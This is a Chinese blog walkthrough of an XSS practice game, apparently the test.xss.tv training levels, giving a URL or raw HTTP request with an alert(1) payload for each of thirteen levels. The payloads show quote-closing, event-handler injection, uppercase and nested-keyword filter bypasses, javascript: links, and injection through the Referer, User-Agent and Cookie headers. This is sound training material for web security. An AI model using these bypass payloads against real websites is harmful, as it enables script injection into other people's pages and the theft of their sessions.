【CTF】某xss练手小游戏

zoukankan html css js c++ java

【CTF】某xss练手小游戏
http://test.xss.tv

1、http://47.94.13.75/test/level1.php?name=test

　　直接插入即可，如：

　　http://47.94.13.75/test/level1.php?name=<script>alert(1)</script>

2、http://47.94.13.75/test/level2.php?keyword=test

　　文本框中输入，闭合一下即可，如：

　　http://47.94.13.75/test/level2.php?keyword="><script>alert(1)</script>

3、http://47.94.13.75/test/level3.php?writing=wait

　　尖括号被编码，直接使用事件即可，如：

　　http://47.94.13.75/test/level3.php?keyword=' onmouseover=alert(1) '&submit=搜索

4、http://47.94.13.75/test/level4.php?keyword=try harder!

　　与第三关类似，使用事件来闭合，弹窗，如：

　　http://47.94.13.75/test/level4.php?keyword=" onmouseover=alert(1) "&submit=搜索

5、http://47.94.13.75/test/level5.php?keyword=find a way out!

　　事件被插入特殊符号，改用其它标签，如：

　　http://47.94.13.75/test/level5.php?keyword="><a href=javascript:alert(1)>click</a>&submit=搜索

　　点击click链接即可弹窗

6、http://47.94.13.75/test/level6.php?keyword=break it out!

　　与第五关类似，这里可以直接用大写绕过，如：

　　http://47.94.13.75/test/level6.php?keyword=" Onmouseover=alert(1) "&submit=搜索

7、http://47.94.13.75/test/level7.php?keyword=move up!

　　on直接被过滤，用嵌套绕过，如：

　　http://47.94.13.75/test/level7.php?keyword=" oonnmouseover=alert(1) "&submit=搜索

8、http://47.94.13.75/test/level8.php?keyword=nice try!

　　链接型，js协议加编码绕过绕过，如：

　　http://47.94.13.75/test/level8.php?keyword=javascript:alert(1)&submit=添加友情链接

9、http://47.94.13.75/test/level9.php?keyword=not bad!

　　构造合法链接，结合js协议与编码绕过，如：

　　http://47.94.13.75/test/level9.php?keyword=javascript:alert("http://")&submit=添加友情链接

10、http://47.94.13.75/test/level10.php?keyword=well done!

　　根据源码构造url参数，如：

　　http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" onmouseover=alert(1) type="button" "

　　http://47.94.13.75/test/level10.php?keyword=well done!&t_sort=xss" accesskey="X" onclick=“alert(1) ///通过shift+alt+X快捷键触发（火狐可以）　

11、http://47.94.13.75/test/level11.php?keyword=good job!

　　抓取post数据包，构造referer值，如：
GET /test/level11.php?keyword=good%20job! HTTP/1.1 Host: 47.94.13.75 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1 Referer:" onmouseover=alert(1) type="button" "
12、http://47.94.13.75/test/level12.php?keyword=good job!

　　构造user-agent值即可，如：
GET /test/level12.php?keyword=good%20job! HTTP/1.1 Host: 47.94.13.75 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0" onmouseover=alert(1) type="button" " Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: keep-alive Upgrade-Insecure-Requests: 1
13、http://47.94.13.75/test/level13.php?keyword=good job!

　　构造cookie，如：
GET /test/level13.php?keyword=good%20job! HTTP/1.1 Host: 47.94.13.75 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Cookie: user=call+me+maybe%3F" onmouseover=alert(1) type="button" " Connection: keep-alive Upgrade-Insecure-Requests: 1
查看全文

相关阅读:
Getting Started with LINQ in C# 章节概况
 LA 2572 Viva Confetti (Geometry.Circle)
uva 10652 Board Wrapping (Convex Hull, Easy)
poj 2743 && LA 3403 Mobile Computing (mideasy Search)
poj 3525 Most Distant Point from the Sea (DC2 + Half Plane)
poj 3134 && LA 3621 Power Calculus (迭代加深深度优先搜索)
LA 4728 Squares (二维凸包+旋转卡壳)
uva 10256 The Great Divide (Convex Hull, Simple)
hdu 2454 Degree Sequence of Graph G
poj 1041 John's trip (Euler Circuit)

原文地址：https://www.cnblogs.com/peterpan0707007/p/8442174.html